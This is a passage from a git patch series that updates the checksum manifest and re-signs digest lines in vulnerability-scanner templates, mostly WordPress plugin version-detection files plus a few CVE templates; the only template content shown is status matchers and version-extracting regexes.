+http/technologies/wordpress/plugins/wordpress-importer.yaml:2ccfef415b6ec122aa61e9d4737fd2dda4146ce5 +http/technologies/wordpress/plugins/wordpress-seo.yaml:d469e16965325c5e4fc2d77d205bbf90081cffe8 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-logging.yaml:43cc5e8e1534e83039984a4f1affb3c2552fe63f -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:10b7d3c96ef44d16cc9ab5da9eeed5395f11396d +http/technologies/wordpress/plugins/worker.yaml:02b6affe837473c1d05cee0d0f41278befd22113 +http/technologies/wordpress/plugins/wp-crontrol.yaml:14102e615506fcce551862caa481cf03e8869ae6 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:d5677654a93ce728d21f1f772a4423ff1f052f59 +http/technologies/wordpress/plugins/wp-file-manager.yaml:3ebaec68b7b25448d1d1487945d6d2d784663330 +http/technologies/wordpress/plugins/wp-google-maps.yaml:5530ff9fe285899a3b185bf4251b3f57576896e7 +http/technologies/wordpress/plugins/wp-mail-logging.yaml:7f7825e4cb201bf9ff9fcf22f7a8f75893498fed +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:c2f6ee9946ac5dfe3ddb8954bd79dc9c11cae481 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:44970d92ae23d479b85de1638a5ea447969ff460 http/technologies/wordpress/plugins/wp-migrate-db.yaml:e4d387e29ada0961b3320d2b69e8773746ca268a -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:9fd574aea7e31e8af8f7bfb08cfc829fb01c3280 +http/technologies/wordpress/plugins/wp-optimize.yaml:ed4c22fe0d5bbaae4b179f43a1523d0f90104ba1 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:3527d9e895162c560b292a3a1ac5c5961ccca771 +http/technologies/wordpress/plugins/wp-reset.yaml:7ecb5d3e10ddef11541fbd5701ebeb7d8abe0219 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:75d611e5caa1d824f5187a6fe43f1c99650d8e04 +http/technologies/wordpress/plugins/wp-rollback.yaml:ac074234e0c5126b0f9bf0e727cd611c5fc2fe11 +http/technologies/wordpress/plugins/wp-seopress.yaml:99e6ba2b348581092fef2f4836935ebc0483acb9 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:329c42c857f483581221233c6b5f418985e5a082 +http/technologies/wordpress/plugins/wp-smushit.yaml:8be8acc42d04aa9b1e6e663ae9a1f0ddb2e19947 +http/technologies/wordpress/plugins/wp-statistics.yaml:69e80936d29ef4886fde0861a3a38dc05614a405 +http/technologies/wordpress/plugins/wp-super-cache.yaml:983f988d243b3c1747e1842690e5044c628ccae5 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:62cac2d74cf7b7032a5d9a480fafd9b0726fd68b +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:33bcd257d611bbc8e84c98b5257b24ba18b7722c +http/technologies/wordpress/plugins/wpforms-lite.yaml:57900f7ba4816260007591a66a01ba830e822f11 +http/technologies/wordpress/plugins/wps-hide-login.yaml:f4b5c98cd8b9a7fe1254db33904c1cc49905e3fa +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:6ced16e367162fe503295572359970522331f417 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:b3123ab3ee85b4c20c15d546eb854fd56bb86b7b http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:cf9a544627bf169a3572f810cd893cecdfdaec2d http/technologies/wordpress-detect.yaml:743b35c9139a66a10e24776aabe59d58f5e4f63c http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -9486,7 +9487,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:34f401c9e0ee311455a14863459a6ee422be0ffe +templates-checksum.txt:2c0bda8a4435eb2c8b10ef6614803427226d7703 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 90b1d2f2419d7ae52ce728bba7e7cc6ef2196d1a Mon Sep 17 00:00:00 2001 From: ghost Date: Wed, 16 Oct 2024 06:48:59 +0000 Subject: [PATCH 168/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- http/cves/2024/CVE-2024-32735.yaml | 3 +-- http/cves/2024/CVE-2024-32736.yaml | 2 ++ http/cves/2024/CVE-2024-32737.yaml | 2 ++ http/cves/2024/CVE-2024-32738.yaml | 2 ++ http/cves/2024/CVE-2024-45488.yaml | 2 ++ http/technologies/wordpress/plugins/ad-inserter.yaml | 3 +-- http/technologies/wordpress/plugins/add-to-any.yaml | 3 +-- http/technologies/wordpress/plugins/admin-menu-editor.yaml | 3 +-- .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 3 +-- http/technologies/wordpress/plugins/akismet.yaml | 3 +-- http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 3 +-- .../wordpress/plugins/all-in-one-wp-migration.yaml | 3 +-- .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 3 +-- http/technologies/wordpress/plugins/amp.yaml | 3 +-- http/technologies/wordpress/plugins/antispam-bee.yaml | 3 +-- http/technologies/wordpress/plugins/astra-sites.yaml | 3 +-- http/technologies/wordpress/plugins/autoptimize.yaml | 3 +-- http/technologies/wordpress/plugins/backwpup.yaml | 3 +-- http/technologies/wordpress/plugins/better-search-replace.yaml | 3 +-- http/technologies/wordpress/plugins/better-wp-security.yaml | 3 +-- .../wordpress/plugins/black-studio-tinymce-widget.yaml | 3 +-- http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 3 +-- http/technologies/wordpress/plugins/breeze.yaml | 3 +-- http/technologies/wordpress/plugins/broken-link-checker.yaml | 3 +-- http/technologies/wordpress/plugins/chaty.yaml | 3 +-- .../wordpress/plugins/child-theme-configurator.yaml | 3 +-- http/technologies/wordpress/plugins/classic-editor.yaml | 3 +-- http/technologies/wordpress/plugins/classic-widgets.yaml | 3 +-- .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 3 +-- http/technologies/wordpress/plugins/cmb2.yaml | 3 +-- http/technologies/wordpress/plugins/coblocks.yaml | 3 +-- http/technologies/wordpress/plugins/code-snippets.yaml | 3 +-- http/technologies/wordpress/plugins/coming-soon.yaml | 3 +-- http/technologies/wordpress/plugins/complianz-gdpr.yaml | 3 +-- .../wordpress/plugins/contact-form-7-honeypot.yaml | 3 +-- http/technologies/wordpress/plugins/contact-form-7.yaml | 3 +-- http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 3 +-- http/technologies/wordpress/plugins/cookie-law-info.yaml | 3 +-- http/technologies/wordpress/plugins/cookie-notice.yaml | 3 +-- http/technologies/wordpress/plugins/copy-delete-posts.yaml | 3 +-- http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 3 +-- .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 3 +-- http/technologies/wordpress/plugins/custom-css-js.yaml | 3 +-- http/technologies/wordpress/plugins/custom-fonts.yaml | 3 +-- http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 3 +-- http/technologies/wordpress/plugins/disable-comments.yaml | 3 +-- http/technologies/wordpress/plugins/disable-gutenberg.yaml | 3 +-- http/technologies/wordpress/plugins/duplicate-page.yaml | 3 +-- http/technologies/wordpress/plugins/duplicate-post.yaml | 3 +-- http/technologies/wordpress/plugins/duplicator.yaml | 3 +-- .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 3 +-- .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 3 +-- http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/elementor.yaml | 3 +-- http/technologies/wordpress/plugins/elementskit-lite.yaml | 3 +-- http/technologies/wordpress/plugins/enable-media-replace.yaml | 3 +-- http/technologies/wordpress/plugins/envato-elements.yaml | 3 +-- .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 3 +-- http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 3 +-- http/technologies/wordpress/plugins/extendify.yaml | 3 +-- .../wordpress/plugins/facebook-for-woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/fast-indexing-api.yaml | 3 +-- http/technologies/wordpress/plugins/flamingo.yaml | 3 +-- http/technologies/wordpress/plugins/fluent-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/fluentform.yaml | 3 +-- http/technologies/wordpress/plugins/font-awesome.yaml | 3 +-- .../wordpress/plugins/force-regenerate-thumbnails.yaml | 3 +-- http/technologies/wordpress/plugins/formidable.yaml | 3 +-- http/technologies/wordpress/plugins/forminator.yaml | 3 +-- http/technologies/wordpress/plugins/ga-google-analytics.yaml | 3 +-- .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 3 +-- .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 3 +-- .../wordpress/plugins/google-analytics-for-wordpress.yaml | 3 +-- .../wordpress/plugins/google-listings-and-ads.yaml | 3 +-- http/technologies/wordpress/plugins/google-site-kit.yaml | 3 +-- .../wordpress/plugins/google-sitemap-generator.yaml | 3 +-- http/technologies/wordpress/plugins/gtranslate.yaml | 3 +-- http/technologies/wordpress/plugins/gutenberg.yaml | 3 +-- .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 3 +-- .../wordpress/plugins/header-footer-code-manager.yaml | 3 +-- .../wordpress/plugins/header-footer-elementor.yaml | 3 +-- http/technologies/wordpress/plugins/header-footer.yaml | 3 +-- http/technologies/wordpress/plugins/health-check.yaml | 3 +-- http/technologies/wordpress/plugins/hello-dolly.yaml | 3 +-- http/technologies/wordpress/plugins/host-webfonts-local.yaml | 3 +-- http/technologies/wordpress/plugins/hostinger.yaml | 3 +-- http/technologies/wordpress/plugins/image-optimization.yaml | 3 +-- http/technologies/wordpress/plugins/imagify.yaml | 3 +-- .../wordpress/plugins/insert-headers-and-footers.yaml | 3 +-- http/technologies/wordpress/plugins/instagram-feed.yaml | 3 +-- .../wordpress/plugins/intuitive-custom-post-order.yaml | 3 +-- http/technologies/wordpress/plugins/jetpack-boost.yaml | 3 +-- http/technologies/wordpress/plugins/jetpack.yaml | 3 +-- http/technologies/wordpress/plugins/kadence-blocks.yaml | 3 +-- http/technologies/wordpress/plugins/kirki.yaml | 3 +-- http/technologies/wordpress/plugins/leadin.yaml | 3 +-- .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 3 +-- http/technologies/wordpress/plugins/limit-login-attempts.yaml | 3 +-- http/technologies/wordpress/plugins/litespeed-cache.yaml | 3 +-- http/technologies/wordpress/plugins/loco-translate.yaml | 3 +-- http/technologies/wordpress/plugins/loginizer.yaml | 3 +-- .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 3 +-- http/technologies/wordpress/plugins/mailpoet.yaml | 3 +-- http/technologies/wordpress/plugins/maintenance.yaml | 3 +-- http/technologies/wordpress/plugins/mainwp-child.yaml | 3 +-- http/technologies/wordpress/plugins/malcare-security.yaml | 3 +-- http/technologies/wordpress/plugins/megamenu.yaml | 3 +-- http/technologies/wordpress/plugins/members.yaml | 3 +-- http/technologies/wordpress/plugins/meta-box.yaml | 3 +-- http/technologies/wordpress/plugins/metform.yaml | 3 +-- http/technologies/wordpress/plugins/ml-slider.yaml | 3 +-- http/technologies/wordpress/plugins/newsletter.yaml | 3 +-- .../wordpress/plugins/nextend-facebook-connect.yaml | 3 +-- http/technologies/wordpress/plugins/nextgen-gallery.yaml | 3 +-- http/technologies/wordpress/plugins/ninja-forms.yaml | 3 +-- http/technologies/wordpress/plugins/ocean-extra.yaml | 3 +-- .../wordpress/plugins/official-facebook-pixel.yaml | 3 +-- http/technologies/wordpress/plugins/one-click-demo-import.yaml | 3 +-- http/technologies/wordpress/plugins/optinmonster.yaml | 3 +-- http/technologies/wordpress/plugins/otter-blocks.yaml | 3 +-- http/technologies/wordpress/plugins/password-protected.yaml | 3 +-- http/technologies/wordpress/plugins/pdf-embedder.yaml | 3 +-- .../wordpress/plugins/pinterest-for-woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/pixelyoursite.yaml | 3 +-- http/technologies/wordpress/plugins/polylang.yaml | 3 +-- http/technologies/wordpress/plugins/popup-maker.yaml | 3 +-- http/technologies/wordpress/plugins/post-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/post-types-order.yaml | 3 +-- .../wordpress/plugins/premium-addons-for-elementor.yaml | 3 +-- http/technologies/wordpress/plugins/pretty-link.yaml | 3 +-- http/technologies/wordpress/plugins/really-simple-captcha.yaml | 3 +-- http/technologies/wordpress/plugins/really-simple-ssl.yaml | 3 +-- http/technologies/wordpress/plugins/redirection.yaml | 3 +-- http/technologies/wordpress/plugins/redux-framework.yaml | 3 +-- http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 3 +-- .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 3 +-- http/technologies/wordpress/plugins/safe-svg.yaml | 3 +-- http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 3 +-- http/technologies/wordpress/plugins/sg-cachepress.yaml | 3 +-- http/technologies/wordpress/plugins/sg-security.yaml | 3 +-- http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 3 +-- .../wordpress/plugins/shortpixel-image-optimiser.yaml | 3 +-- .../wordpress/plugins/simple-custom-post-order.yaml | 3 +-- http/technologies/wordpress/plugins/simple-history.yaml | 3 +-- http/technologies/wordpress/plugins/siteguard.yaml | 3 +-- http/technologies/wordpress/plugins/siteorigin-panels.yaml | 3 +-- http/technologies/wordpress/plugins/smart-slider-3.yaml | 3 +-- http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 3 +-- .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 3 +-- .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 3 +-- http/technologies/wordpress/plugins/sucuri-scanner.yaml | 3 +-- http/technologies/wordpress/plugins/svg-support.yaml | 3 +-- http/technologies/wordpress/plugins/tablepress.yaml | 3 +-- http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 3 +-- http/technologies/wordpress/plugins/templately.yaml | 3 +-- http/technologies/wordpress/plugins/the-events-calendar.yaml | 3 +-- http/technologies/wordpress/plugins/tinymce-advanced.yaml | 3 +-- .../wordpress/plugins/translatepress-multilingual.yaml | 3 +-- .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 3 +-- .../wordpress/plugins/under-construction-page.yaml | 3 +-- http/technologies/wordpress/plugins/updraftplus.yaml | 3 +-- http/technologies/wordpress/plugins/user-role-editor.yaml | 3 +-- http/technologies/wordpress/plugins/w3-total-cache.yaml | 3 +-- .../wordpress/plugins/webp-converter-for-media.yaml | 3 +-- http/technologies/wordpress/plugins/webp-express.yaml | 3 +-- .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 3 +-- .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 3 +-- .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 3 +-- .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 3 +-- .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 3 +-- http/technologies/wordpress/plugins/woocommerce-payments.yaml | 3 +-- .../wordpress/plugins/woocommerce-paypal-payments.yaml | 3 +-- .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 3 +-- http/technologies/wordpress/plugins/woocommerce-services.yaml | 3 +-- http/technologies/wordpress/plugins/woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/wordfence.yaml | 3 +-- http/technologies/wordpress/plugins/wordpress-importer.yaml | 3 +-- http/technologies/wordpress/plugins/wordpress-seo.yaml | 3 +-- http/technologies/wordpress/plugins/worker.yaml | 3 +-- http/technologies/wordpress/plugins/wp-crontrol.yaml | 3 +-- http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 3 +-- http/technologies/wordpress/plugins/wp-file-manager.yaml | 3 +-- http/technologies/wordpress/plugins/wp-google-maps.yaml | 3 +-- http/technologies/wordpress/plugins/wp-mail-logging.yaml | 3 +-- http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 3 +-- http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 3 +-- http/technologies/wordpress/plugins/wp-optimize.yaml | 3 +-- http/technologies/wordpress/plugins/wp-pagenavi.yaml | 3 +-- http/technologies/wordpress/plugins/wp-reset.yaml | 3 +-- .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 3 +-- http/technologies/wordpress/plugins/wp-rollback.yaml | 3 +-- http/technologies/wordpress/plugins/wp-seopress.yaml | 3 +-- http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 3 +-- http/technologies/wordpress/plugins/wp-smushit.yaml | 3 +-- http/technologies/wordpress/plugins/wp-statistics.yaml | 3 +-- http/technologies/wordpress/plugins/wp-super-cache.yaml | 3 +-- http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 3 +-- http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 3 +-- http/technologies/wordpress/plugins/wpforms-lite.yaml | 3 +-- http/technologies/wordpress/plugins/wps-hide-login.yaml | 3 +-- http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 3 +-- .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 3 +-- 204 files changed, 208 insertions(+), 400 deletions(-) diff --git a/http/cves/2024/CVE-2024-32735.yaml b/http/cves/2024/CVE-2024-32735.yaml index 0f8c5f4075..5550e2637b 100644 --- a/http/cves/2024/CVE-2024-32735.yaml +++ b/http/cves/2024/CVE-2024-32735.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022074c23f569a7ddf077df815873a85b19ab72358ef948d53786834fc878b15029c022100c8ef22e47a987b8538383aa10b93fc688968b7b97095b752b95894f2988d08c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207bfd65161266762c2af8d49a907f0133c98a0132d8901a964aef14c2ae62a7e402207fea26ab03d616e0f5a10e69a41f37f7b4398805e025f4dca3787053ce8730ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32736.yaml b/http/cves/2024/CVE-2024-32736.yaml index 9de1269f71..01cd9bd5bc 100644 --- a/http/cves/2024/CVE-2024-32736.yaml +++ b/http/cves/2024/CVE-2024-32736.yaml @@ -56,3 +56,5 @@ http: group: 1 regex: - '"code":"([0-9.]+)"' + +# digest: 4b0a00483046022100c53a68d8602f8407408a7e2ac80ae83eb5f2c3a1a7784869a365ec42e77dbe8a02210083168d966666dc59f2e036227f315cf8325a7f2e310c0fe34718cd471c4e6e51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32737.yaml b/http/cves/2024/CVE-2024-32737.yaml index ff61f6d69e..f122d4aef4 100644 --- a/http/cves/2024/CVE-2024-32737.yaml +++ b/http/cves/2024/CVE-2024-32737.yaml @@ -53,3 +53,5 @@ http: group: 1 regex: - '"modifiedtime":"([0-9.]+)"' + +# digest: 490a0046304402204ea4981591285e766ca2596537a9ae7ae69c7aaf2aa391d555cf777d1540a8080220792ae00f07355787738a033cc38ba51140eb704f3135269e980a9d2f64d0f467:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32738.yaml b/http/cves/2024/CVE-2024-32738.yaml index 5eff492708..36d828fbbd 100644 --- a/http/cves/2024/CVE-2024-32738.yaml +++ b/http/cves/2024/CVE-2024-32738.yaml @@ -54,3 +54,5 @@ http: group: 1 regex: - '"modifiedtime":"([0-9.]+)"' + +# digest: 4a0a00473045022068f55aa572b03b7f0890f54dfd9dd91e9a9609a646883bd8e2512174f1e98d6a022100c8419d9bbf41d60e68b66a77b1bc6194afb1f26fdf925d7fd00275fbb7a70b25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-45488.yaml b/http/cves/2024/CVE-2024-45488.yaml index 4ee6eccef1..c1b4a74e0f 100644 --- a/http/cves/2024/CVE-2024-45488.yaml +++ b/http/cves/2024/CVE-2024-45488.yaml @@ -315,3 +315,5 @@ http: - type: status status: - 200 + +# digest: 4a0a00473045022100a2ece1f3c1f563345188e6bd58b7fdb7125daa11d1f4030ac80e39f7b445e95a02200db92360d521ced0bb816bc06eb9b6296d479ce4f607445282854fc80962c1d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 26175cc6af..a6985ccfbc 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200da68207ca771ac47b0e46a39a33334a7abff2b63fb7ece48c4a37179d6a220802202f53da621e1f6cf7b45d0cd1e0d7f40f970053091be086557cbd3a25e715bed4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a5810803f5a74bf8af85b82942a1ae18676897f936dbe1ae30ecb20a9918be1a02206293fe49a3b18ceac3719eb0c17e937ec0e5f6641519b6002a78696d9fb74c7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 1ed1d7cc93..cfd4aa8cc3 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a98dfa7b9ce61a8937abdaa6965bd7d3dfe085b6d5907ed831d6e6882e964657022058009c678e5cdb0258590c127b45d496b1a3b38400191bb5267d795a0e5b5793:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202918a5094ce084c4d424c9feddd08ff242eef51dc198c173a3ffa821b07816c902207cbbc117a6291547218936981fd93d88401b18fc654816500514baab7883573d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 3cf8093bd9..5ceaa4046e 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022032a8894326ab979f0c70db061d70fb1e29a27467ecb91080e64647698780ff54022100a8202c650e636a553a57be065107672adeac3e2da2faa6087cd16fad877ffb7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210082bb23b99ed25bc2cdd1341b56cf445904fe258e7001c1417948a748ba1cf8110221009671b988c6d6bfe0617801d6d2cc80e9b590e9e1382b8b42a36ab0239b564d4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 600b098f52..556f6b7b45 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c0ed36ab2928d9047c5fe63b60ebf35182ed7a71bcbb4ee0305dc037fdefe630022042c936170b877de666502eb2cc4eda27d00f1c19518a58e1b2ea3eb9cb843b62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c33ff199435a35884a1fdb84135cd37392643ab2fd68c2427c32f9253d55945502200ff8683e530b0545188bcf264b8067b961dc97ad1bc0b2e43486b232fb965289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index dabe5c0766..7faf7483b0 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a43b74463b1d725f8b1f68706574dac1fff47fe5f63e8e17e2027370d193d0980221008182d5b8272e4f970b088b6e34764d6818a05c53ecaa8f32a389999b38c6dff2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043e5ae7906e122bde13118dde8343ca5a1ea491af521a17d84fbca232dcde9ad02200a48695afda4885225605c44d8b0b811de4e5f69141577bbb42d1d5b2748f764:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 55d9413f58..c114554487 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022014d908ad1ed373f55288761f804d3f18c75ce4864b27e70bfb2074b98f29483e022100d44b61e0d4c9638a4adb772370f2def8754cf11f53090f7879a9ea33d4ce18ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b11809c7fc6e6d64d9530c8dfa32174ca529ba33ba78488b3949d1be659233f70221009f5d963d6fd1a4582bd7d542eb984433efe51c4f2dee5c3f683ab414ab925094:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 0e8d812f31..141d854cdd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 